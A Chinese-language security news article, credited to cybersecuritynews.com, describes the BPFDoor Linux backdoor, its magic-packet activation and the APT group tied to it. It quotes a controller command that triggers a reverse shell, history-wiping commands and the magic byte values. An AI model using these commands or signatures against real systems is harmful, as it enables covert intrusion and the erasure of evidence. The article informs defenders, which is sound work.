称为 BPFDoor 的类似 Rootkit 的隐蔽恶意软件使用 Reverse Shell 深入挖掘受感染的网络

一种名为 BPFDoor 的复杂后门恶意软件一直积极针对亚洲、中东和非洲的组织，利用先进的隐身技术来逃避检测。

这个 Linux 后门利用伯克利数据包过滤 （BPF） 技术在内核级别监控网络流量，使其能够隐藏在传统的安全扫描中，同时保持对受感染系统的持续访问。

据观察，BPFDoor 以电信、金融和零售行业为目标，最近在韩国、香港、缅甸、马来西亚和埃及记录了攻击。

该恶意软件能够在不侦听网络端口的情况下运行，这使得使用端口扫描等传统安全措施特别难以检测到，从而使其在很长一段时间内无法被发现。

Trend Micro 研究人员指出，这些攻击背后的威胁行为者是 Earth Bluecrow（也被跟踪为 Red Menshen），这是一个高级持续威胁 （APT） 组织，一直在部署 BPFDoor 进行网络间谍活动。

根据他们的遥测数据，该组织已经活跃了至少四年，有证据表明多起事件可以追溯到 2021 年。

该恶意软件的设计使其能够将 BPF 过滤器注入作系统的内核中，在那里它可以检查网络数据包并在收到特制的“魔术序列”时激活——触发特定后门功能的预定字节模式。

这种类似 rootkit 的功能允许 BPFDoor 混入系统，更改进程名称并采用其他规避策略来避免被发现。

对于受 BPFDoor 影响的组织，影响很严重。后门为威胁行为者创造了一个持久的、几乎不可见的渠道，让他们可以长时间访问敏感数据和系统，使其成为长期间谍活动的理想工具。

反向 Shell 机制：隐藏的控制器

BPFDoor 功能的核心是其控制器模块，它使攻击者能够与受感染的主机建立反向 shell 连接。

此功能允许威胁行为者更深入地挖掘受感染的网络，从而促进横向移动和访问其他系统和敏感数据。

控制器发送包含幻字节（例如 TCP 的 0x5293 或 UDP 的 0x7255）、目标要连接到的远程 IP 地址和端口以及身份验证密码的激活数据包。

反向连接模式流程

正确配置后，这将启动从受害者计算机返回攻击者系统的反向 shell 连接。

./controller -cd 22 -h 192.168.32.156 -ms 8000

此命令指示控制器请求从受感染计算机 （192.168.32.156） 到攻击者计算机端口 8000 的反向 shell 连接。

恶意软件作者采取了措施来消除他们在受感染系统上活动的证据：-

export MYSQL_HISTFILE=/dev/nullexport HISTFILE=/dev/null

这些命令会禁用命令历史记录，这表明攻击者专门针对运行 MySQL 数据库软件的系统。

对于网络防御者来说，检测 BPFDoor 仍然具有挑战性，因为它能够跨多种协议（TCP、UDP 和 ICMP）运行，并且攻击者可以轻松修改用于激活的魔术字节序列。

随着这种威胁的不断发展，组织必须实施先进的监控解决方案，这些解决方案能够检测与 BPFDoor 通信和激活序列相关的特定模式。

原文来自: cybersecuritynews.com